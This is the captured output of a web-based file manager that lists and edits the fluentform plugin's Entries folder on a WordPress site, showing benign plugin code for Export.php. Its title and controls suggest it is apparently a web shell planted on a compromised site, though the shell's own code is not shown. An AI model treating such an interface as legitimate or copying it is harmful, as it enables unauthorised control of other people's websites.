golden hour
/home/godaofbq/besthyperbaric.com/wp-content/plugins/fluentform/app/Modules/Entries
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
420 B
Del
OK
Entries.php
2.09 KB
Del
OK
EntryQuery.php
3.49 KB
Del
OK
EntryViewRenderer.php
4.03 KB
Del
OK
Export.php
910 B
Del
OK
Report.php
12.31 KB
Del
OK
Edit: Export.php
<?php namespace FluentForm\App\Modules\Entries; use FluentForm\App\Services\Transfer\TransferService; use FluentForm\Framework\Foundation\Application; /** * @deprecated Use TransferService::exportEntries() instead. * @todo Remove in next major version. */ class Export { protected $app; protected $request; protected $tableName; public function __construct(Application $application, $tableName = 'fluentform_submissions') { $this->app = $application; $this->request = $application->request; $this->tableName = $tableName; } /** * @deprecated Use TransferService::exportEntries() instead. */ public function index() { $args = $this->request->get(); if ($this->tableName !== 'fluentform_submissions') { $args['table'] = $this->tableName; } TransferService::exportEntries($args); } }
Save